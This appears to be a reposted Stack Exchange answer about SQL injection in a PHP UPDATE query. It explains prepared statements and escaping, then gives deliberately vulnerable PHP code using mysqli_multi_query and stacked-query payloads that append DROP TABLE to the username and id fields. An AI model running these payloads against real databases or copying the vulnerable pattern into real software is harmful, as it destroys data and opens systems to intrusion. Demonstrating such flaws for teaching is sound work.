寻求PHP中UPDATE查询的SQL注入漏洞利用方法(演示用)
Hey John, let's break this down step by step. Since you only shared a snippet of your code, I'll cover the most common reasons your UPDATE query might not be vulnerable, plus how to intentionally make it exploitable so you can demo SQL injection properly.
First, let's rule out the safe practices that could be blocking injection attempts:
- Parameterized (Prepared) Statements: If you're using PDO or mysqli's prepared statements with bound parameters, user input is treated as raw data, not executable SQL. For example:
This wraps input in safe, escaped contexts—so any$stmt = $pdo->prepare("UPDATE users SET email = ? WHERE id = ?"); $stmt->execute([$_POST['email'], $_SESSION['user_id']]);' DROP TABLE...you enter gets stored as part of the email string, not run as SQL. - Input Escaping: If you're using functions like
mysqli_real_escape_string()or evenaddslashes()(though it's not ideal for all cases), special characters like single quotes get escaped (turned into\'). This breaks the structure of injection payloads, turning malicious input into harmless string data. - Non-User-Controlled WHERE Clause: If your UPDATE's
WHEREuses a fixed value (like$_SESSION['user_id']that users can't modify), even if theSETpart had a flaw, executingDROP TABLEis tricky. Most PHP database drivers disable stacked queries (running multiple SQL statements at once) by default, so you can't just tack aDROPonto the end of an UPDATE.
To intentionally create a vulnerable scenario, you need to remove those safeguards and set up conditions that let user input directly modify the SQL string. Here's how:
Example Vulnerable Code
This is purposefully unsafe code for demonstration only—never use this in production:
session_start(); require_once 'config.php'; error_reporting(E_ALL); // Directly concatenate user input into SQL (no filtering/preprocessing) $new_username = $_POST['username']; // Let the user control the ID in the WHERE clause (instead of using a session value) $target_user_id = $_POST['user_id']; // Use mysqli_multi_query() to allow stacked queries (multiple SQL statements) $query = "UPDATE users SET username = '$new_username' WHERE id = $target_user_id"; mysqli_multi_query($conn, $query);
Injecting DROP TABLE
With the code above, you can use these payloads to execute the drop command:
Payload for the Username Field
Enter this into the username input box:
' ; DROP TABLE demo_test_table; --
When concatenated, the SQL becomes:
UPDATE users SET username = '' ; DROP TABLE demo_test_table; --' WHERE id = 1
- The
'closes the original string quote, ending the UPDATE'sSETclause. - The
;terminates the UPDATE statement. DROP TABLE demo_test_table;runs the delete command.--comments out the remaining SQL (' WHERE id = 1) to avoid syntax errors.
Payload for the User ID Field
Since the ID is a numeric value (no quotes around it), enter this into the user ID input:
1 ; DROP TABLE demo_test_table; --
The resulting SQL will be:
UPDATE users SET username = 'test' WHERE id = 1 ; DROP TABLE demo_test_table; --
- Test Locally Only: Use a local environment like XAMPP or WAMP—never experiment with this on a live server.
- Enable Stacked Queries: For mysqli, use
mysqli_multi_query()instead ofmysqli_query()(the latter only runs the first statement). For PDO, you'll need to enable multi-statements in your DSN:new PDO("mysql:host=localhost;dbname=test", "user", "pass", [PDO::MYSQL_ATTR_MULTI_STATEMENTS => true]). - Check Database Privileges: Make sure your database user has permission to drop tables—otherwise the injection will fail with a permission error.
- Use Error Reporting: Your existing
error_reporting(E_ALL);will help you debug payloads by showing SQL syntax errors if something goes wrong.
内容的提问来源于stack exchange,提问作者John

